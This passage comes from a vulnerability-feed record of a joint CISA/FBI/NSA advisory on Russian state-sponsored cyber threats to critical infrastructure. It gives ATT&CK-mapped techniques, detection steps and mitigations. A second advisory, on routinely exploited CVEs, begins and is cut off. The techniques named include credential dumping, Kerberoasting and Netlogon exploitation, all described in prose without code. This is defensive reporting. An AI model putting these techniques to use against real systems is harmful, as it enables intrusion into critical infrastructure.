[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\nRussian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware. The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments\u2014including cloud environments\u2014by using legitimate credentials.\n\nIn some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware. See the following advisories and alerts for information on historical Russian state-sponsored cyber-intrusion campaigns and customized malware that have targeted ICS:\n\n * ICS Advisory [ICS Focused Malware \u2013 Havex](<https://us-cert.cisa.gov/ics/advisories/ICSA-14-178-01>)\n * ICS Alert [Ongoing Sophisticated Malware Campaign Compromising ICS (Update E)](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-14-281-01B>)\n * ICS Alert [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/IR-ALERT-H-16-056-01>)\n * Technical Alert [CrashOverride Malware](<https://us-cert.cisa.gov/ncas/alerts/TA17-163A>)\n * CISA MAR [HatMan: Safety System Targeted Malware (Update B)](<https://us-cert.cisa.gov/ics/MAR-17-352-01-HatMan-Safety-System-Targeted-Malware-Update-B>)\n * CISA ICS Advisory [Schneider Electric Triconex Tricon (Update B)](<https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-02>)\n\nRussian state-sponsored APT actors have used sophisticated cyber capabilities to target a variety of U.S. and international critical infrastructure organizations, including those in the Defense Industrial Base as well as the Healthcare and Public Health, Energy, Telecommunications, and Government Facilities Sectors. High-profile cyber activity publicly attributed to Russian state-sponsored APT actors by U.S. government reporting and legal actions includes:\n\n * **Russian state-sponsored APT actors targeting state, local, tribal, and territorial (SLTT) governments and aviation networks, September 2020, through at least December 2020.** Russian state-sponsored APT actors targeted dozens of SLTT government and aviation networks. The actors successfully compromised networks and exfiltrated data from multiple victims.\n * **Russian state-sponsored APT actors\u2019 global Energy Sector intrusion campaign, 2011 to 2018. **These Russian state-sponsored APT actors conducted a multi-stage intrusion campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.\n * **Russian state-sponsored APT actors\u2019 campaign against Ukrainian critical infrastructure, 2015 and 2016.** Russian state-sponsored APT actors conducted a cyberattack against Ukrainian energy distribution companies, leading to multiple companies experiencing unplanned power outages in December 2015. The actors deployed [BlackEnergy](<https://attack.mitre.org/versions/v10/software/S0089>) malware to steal user credentials and used its destructive malware component, KillDisk, to make infected computers inoperable. In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed [CrashOverride ](<https://attack.mitre.org/versions/v10/software/S0604>)malware specifically designed to attack power grids.\n\nFor more information on recent and historical Russian state-sponsored malicious cyber activity, see the referenced products below or [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>).\n\n * Joint FBI-DHS-CISA CSA [Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://us-cert.cisa.gov/ncas/alerts/aa21-116a>)\n * Joint NSA-FBI-CISA CSA [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)\n * Joint FBI-CISA CSA [Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://www.cisa.gov/uscert/ncas/alerts/aa20-296a>)\n * Joint CISA-FBI CSA [APT Actors Chaining Vulnerabilities against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n * CISA\u2019s webpage [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA Alert [Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA18-074A>)\n * CISA ICS Alert: [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/ir-alert-h-16-056-01>)\n\nTable 1 provides common, publicly known TTPs employed by Russian state-sponsored APT actors, which map to the MITRE ATT&amp;CK for Enterprise framework, version 10. **Note:** these lists are not intended to be all inclusive. Russian state-sponsored actors have modified their TTPs before based on public reporting.[[1](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)] Therefore, CISA, the FBI, and NSA anticipate the Russian state-sponsored actors may modify their TTPs as they deem necessary to reduce their risk of detection. \n\n_Table 1: Common Tactics and Techniques Employed by Russian State-Sponsored APT Actors_\n\nTactic | **Technique** | **Procedure** \n---|---|--- \n \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]\n\n| \n\nActive Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)] \n \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \n \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]\n\n| \n\nRussian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \n \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)\n\n| \n\nDevelop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]\n\n| \n\nRussian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\n| \n\nExploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]\n\n| \n\nRussian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \n \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]\n\n| \n\nRussian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\n| \n\nCommand and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]\n\n| \n\nRussian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]\n\n| \n\nValid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]\n\n| \n\nRussian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]\n\n| \n\nBrute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]\n\n| \n\nRussian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \n \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]\n\n| \n\nRussian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \n \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]\n\n| \n\nRussian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \n \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]\n\n| \n\nRussian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]\n\n| \n\nRussian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \n \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]\n\n| \n\nRussian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \n \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]\n\n| \n\nProxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]\n\n| \n\nRussian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic. \n \nFor additional enterprise TTPs used by Russian state-sponsored APT actors, see the ATT&amp;CK for Enterprise pages on [APT29](<https://attack.mitre.org/versions/v10/groups/G0016>), [APT28](<https://attack.mitre.org/versions/v10/groups/G0007>), and the [Sandworm Team](<https://attack.mitre.org/versions/v10/groups/G0034>), respectively. For information on ICS TTPs see the [ATT&amp;CK for ICS](<https://collaborate.mitre.org/attackics/index.php/Main_Page>) pages on the [Sandworm Team](<https://collaborate.mitre.org/attackics/index.php/Group/G0007>), [BlackEnergy 3 ](<https://collaborate.mitre.org/attackics/index.php/software/S0004>)malware, [CrashOveride](<https://collaborate.mitre.org/attackics/index.php/software/S0001>) malware, BlackEnergy\u2019s [KillDisk](<https://collaborate.mitre.org/attackics/index.php/software/S0016>) component, and [NotPetya](<https://collaborate.mitre.org/attackics/index.php/software/S0006>) malware.\n\n### Detection\n\nGiven Russian state-sponsored APT actors demonstrated capability to maintain persistent, long-term access in compromised enterprise and cloud environments, CISA, the FBI, and NSA encourage all critical infrastructure organizations to:\n\n * **Implement robust log collection and retention.** Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, examples include: \n * Native tools such as M365\u2019s Sentinel. \n * Third-party tools, such as Sparrow, Hawk, or CrowdStrike's Azure Reporting Tool (CRT), to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. **Note:** for guidance on using these and other detection tools, refer to CISA Alert [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n * **Look for behavioral evidence or network and host-based artifacts **from known Russian state-sponsored TTPs. See table 1 for commonly observed TTPs. \n * To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for multiple, failed authentication attempts across multiple accounts.\n * To detect use of compromised credentials in combination with a VPS, follow the below steps: \n * Look for suspicious \u201cimpossible logins,\u201d such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * Look for one IP used for multiple accounts, excluding expected logins.\n * Look for \u201cimpossible travel.\u201d Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). **Note:** implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.\n * Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Look for suspicious privileged account use after resetting passwords or applying user account mitigations. \n * Look for unusual activity in typically dormant accounts.\n * Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.\n * For organizations with OT/ICS systems: \n * Take note of unexpected equipment behavior; for example, unexpected reboots of digital controllers and other OT hardware and software. \n * Record delays or disruptions in communication with field equipment or other OT devices. Determine if system parts or components are lagging or unresponsive.\n\n### Incident Response\n\nOrganizations detecting potential APT activity in their IT or OT networks should:\n\n 1. Immediately isolate affected systems. \n 2. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.\n 3. Collect and review relevant logs, data, and artifacts.\n 4. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 5. Report incidents to [CISA](<https://www.cisa.gov/uscert/report>) and/or the FBI via your [local FBI field office](<http://www.fbi.gov/contact-us/field>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n\n**Note:** for OT assets, organizations should have a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. Refer to the Mitigations section for more information.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA, the FBI, and NSA encourage critical infrastructure owners and operators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response. \n\n**Note: **organizations should document incident response procedures in a cyber incident response plan, which organizations should create and exercise (as noted in the Mitigations section). \n\n### Mitigations\n\nCISA, the FBI, and NSA encourage all organizations to implement the following recommendations to increase their cyber resilience against this threat.\n\n### Be Prepared\n\n#### _Confirm Reporting Processes and Minimize Coverage Gaps_\n\n * Develop internal contact lists. Assign main points of contact for a suspected incident as well as roles and responsibilities and ensure personnel know how and when to report an incident.\n * Minimize gaps in IT/OT security personnel availability by identifying surge support for responding to an incident. Malicious cyber actors are [known to target organizations on weekends and holidays](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) when there are gaps in organizational cybersecurity\u2014critical infrastructure organizations should proactively protect themselves by minimizing gaps in coverage.\n * Ensure IT/OT security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any identified IOCs and TTPs for immediate response. (See table 1 for commonly observed TTPs).\n\n#### _Create, Maintain, and Exercise a Cyber Incident Response, Resilience Plan, and Continuity of Operations Plan_\n\n * Create, maintain, and exercise a cyber incident response and continuity of operations plan.\n * Ensure personnel are familiar with the key steps they need to take during an incident and are positioned to act in a calm and unified manner. Key questions: \n * Do personnel have the access they need?\n * Do they know the processes?\n * For OT assets/networks, \n * Identify a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. \n * Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.\n * Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.\n * Implement data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.\n * In addition to backing up data, develop recovery documents that include configuration settings for common devices and critical OT equipment. This can enable more efficient recovery following an incident.\n\n### Enhance your Organization\u2019s Cyber Posture\n\nCISA, the FBI, and NSA recommend organizations apply the best practices below for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n\n#### _Identity and Access Management_\n\n * Require multi-factor authentication for all users, without exception.\n * Require accounts to have strong passwords and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access.\n * Secure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials. \n * Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.\n * Disable the storage of clear text passwords in LSASS memory.\n * Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.\n * Implement Credential Guard for Windows 10 and Server 2016 (Refer to [Microsoft: Manage Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage>) for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).\n * Minimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious activity such as \u201cKerberoasting\u201d takes advantage of Kerberos\u2019 TGS and can be used to obtain hashed credentials that attackers attempt to crack.\n * Set a [strong](<https://www.us-cert.cisa.gov/ncas/tips/ST04-002>) password policy for service accounts.\n * Audit Domain Controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity. \n * Secure accounts.\n * Enforce the principle of least privilege. Administrator accounts should have the minimum permission they need to do their tasks.\n * Ensure there are unique and distinct administrative accounts for each set of administrative tasks.\n * Create non-privileged accounts for privileged users and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n\n#### _Protective Controls and Architecture_\n\n * Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor or malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Enable strong spam filters. \n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Filter emails containing executable files to prevent them from reaching end users.\n * Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.\n\n**Note:** CISA, the FBI, and NSA also recommend, as a longer-term effort, that critical infrastructure organizations implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks.\n\n * Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.\n * Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.\n\n#### _Vulnerability and Configuration Management_\n\n * Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. \n * Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program. \n * Consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.\n * Use industry recommended antivirus programs. \n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures.\n * Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.\n * Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.\n * Disable all unnecessary ports and protocols \n * Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.\n * Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.\n * Ensure OT hardware is in read-only mode.\n\n### Increase Organizational Vigilance\n\n * Regularly review reporting on this threat. Consider signing up for CISA notifications to receive timely information on current security issues, vulnerabilities, and high-impact activity.\n\n### Resources\n\n * For more information on Russian state-sponsored malicious cyber activity, refer to [cisa.gov/Russia.](<https://www.us-cert.cisa.gov/russia>)\n * Refer to CISA Analysis Report [Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a>) for steps for guidance on strengthening your organizations cloud security practices.\n * Leaders of small businesses and small and local government agencies should see [CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) for guidance on developing an actionable understanding of implementing organizational cybersecurity practices.\n * Critical infrastructure owners and operators with OT/ICS networks, should review the following resources for additional information: \n * NSA and CISA joint CSA NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems\n * CISA factsheet Rising Ransomware Threat to Operational Technology Assets for additional recommendations.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to [rewardsforjustice.net/malicious_cyber_activity.](<https://www.rewardsforjustice.net/malicious_cyber_activity.html>)\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or NSA.\n\n### References\n\n[[1] Joint NCSC-CISA UK Advisory: Further TTPs Associated with SVR Cyber Actors](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)\n\n### Revisions\n\nJanuary 11, 2022: Initial Version|January 25, 2022: Updated broken link|February 28, 2022: Updated broken link\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T12:00:00", "type": "ics", "title": "Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-03-01T12:00:00", "id": "AA22-011A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-011a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:31:18", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). \n\nThis advisory provides details on the top 30 vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021. \n\nCyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Key Findings\n\nIn 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.\n\n**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. **Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.\n\nCISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. \n\n_Table 1:Top Routinely Exploited CVEs in 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nType \n \n---|---|--- \n \nCitrix\n\n| \n\nCVE-2019-19781\n\n| \n\narbitrary code execution \n \nPulse\n\n| \n\nCVE 2019-11510\n\n| \n\narbitrary file reading \n \nFortinet\n\n| \n\nCVE 2018-13379\n\n| \n\npath traversal \n \nF5- Big IP\n\n| \n\nCVE 2020-5902\n\n| \n\nremote code execution (RCE) \n \nMobileIron\n\n| \n\nCVE 2020-15505\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2017-11882\n\n| \n\nRCE \n \nAtlassian\n\n| \n\nCVE-2019-11580\n\n| \n\nRCE \n \nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nRCE \n \nTelerik\n\n| \n\nCVE 2019-18935\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2019-0604\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2020-0787\n\n| \n\nelevation of privilege \n \nMicrosoft\n\n| \n\nCVE-2020-1472\n\n| \n\nelevation of privilege \n \nIn 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.\n\nCISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \n\nOrganizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.\n\n### 2020 CVEs\n\nCISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY FURTHER TTPS ASSOCIATED WITH SVR CYBER ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix\u2019s Application Delivery Controller (ADC)\u2014a load balancing application for web, application, and database servers widely use throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)] \n\nIdentified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)], in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating Recent VPN Vulnerabilities - Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12]](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)[[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]\n\nThe CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and 